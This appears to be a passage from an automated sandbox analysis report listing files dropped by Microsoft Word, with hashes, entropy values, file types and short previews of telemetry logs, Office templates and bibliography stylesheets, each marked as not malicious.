    SHA-512:1CA98CE46300DA7ED9A3566F0ED03976F234C8BCBFA4683236061A39A3BD5AC2492455B7409C462156EF573B2F5B2C2E16952206C74C1EA7D07A52A17A6D1E8A
    Malicious:false
    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/22/2024 13:58:33.768.WINWORD (0xF10).0x19F8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-07-22T13:58:33.768Z","Contract":"Office.System.Activity","Activity.CV":"spLUd5J+P0GyM7B2cBEPMg.1.14","Activity.Duration":17,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...07/22/2024 13:58:33.768.WINWORD (0xF10).0x19F8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-07-22T13:58:33.768Z","Contract":"Office.System.Activity","Activity.CV":"spLUd5J+P0GyM7B2cBEPMg.1.15","Activity.Duration":8845,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion":
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):558035
    Entropy (8bit):7.696653383430889
    Encrypted:false
    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):276
    Entropy (8bit):3.5361139545278144
    Encrypted:false
    SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
    MD5:133D126F0DE2CC4B29ECE38194983265
    SHA1:D8D701298D7949BE6235493925026ED405290D43
    SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
    SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
    Malicious:false
    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):570901
    Entropy (8bit):7.674434888248144
    Encrypted:false
    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):282
    Entropy (8bit):3.5459495297497368
    Encrypted:false
    SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
    MD5:76340C3F8A0BFCEDAB48B08C57D9B559
    SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
    SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
    SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
    Malicious:false
    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):4026
    Entropy (8bit):7.809492693601857
    Encrypted:false
    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):250
    Entropy (8bit):3.4916022431157345
    Encrypted:false
    SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
    MD5:1A314B08BB9194A41E3794EF54017811
    SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
    SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
    SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):16806
    Entropy (8bit):7.9519793977093505
    Encrypted:false
    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
    MD5:950F3AB11CB67CC651082FEBE523AF63
    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):254
    Entropy (8bit):3.4720677950594836
    Encrypted:false
    SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
    MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
    SHA1:668FF6DFE64D5306220341FC2C1353199D122932
    SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
    SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):280
    Entropy (8bit):3.484503080761839
    Encrypted:false
    SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
    MD5:1309D172F10DD53911779C89A06BBF65
    SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
    SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
    SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):9191
    Entropy (8bit):7.93263830735235
    Encrypted:false
    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):333258
    Entropy (8bit):4.654450340871081
    Encrypted:false
    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
    MD5:5632C4A81D2193986ACD29EADF1A2177
    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):328
    Entropy (8bit):3.541819892045459
    Encrypted:false
    SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
    MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
    SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
    SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
    SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):290
    Entropy (8bit):3.5081874837369886
    Encrypted:false
    SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
    MD5:8D9B02CC69FA40564E6C781A9CC9E626
    SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
    SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
    SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):255948
    Entropy (8bit):5.103631650117028
    Encrypted:false
    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
    MD5:9888A214D362470A6189DEFF775BE139
    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):256
    Entropy (8bit):3.464918006641019
    Encrypted:false
    SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
    MD5:93149E194021B37162FD86684ED22401
    SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
    SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
    SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):51826
    Entropy (8bit):5.541375256745271
    Encrypted:false
    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
    MD5:2AB22AC99ACFA8A82742E774323C0DBD
    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
    Malicious:false
    Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):258
    Entropy (8bit):3.4692172273306268
    Encrypted:false
    SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
    MD5:C1B36A0547FB75445957A619201143AC
    SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
    SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
    SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):7370
    Entropy (8bit):7.9204386289679745
    Encrypted:false
    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
    MD5:586CEBC1FAC6962F9E36388E5549FFE9
    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
    Malicious:false
    Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):3.538396048757031
    Encrypted:false
    SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
    MD5:149948E41627BE5DC454558E12AF2DA4
    SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
    SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
    SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):250983
    Entropy (8bit):5.057714239438731
    Encrypted:false
    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
    MD5:F883B260A8D67082EA895C14BF56DD56
    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):256
    Entropy (8bit):3.4842773155694724
    Encrypted:false
    SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
    MD5:923D406B2170497AD4832F0AD3403168
    SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
    SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
    SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):11380
    Entropy (8bit):7.891971054886943
    Encrypted:false
    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
    MD5:C9F9364C659E2F0C626AC0D0BB519062
    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
    Malicious:false
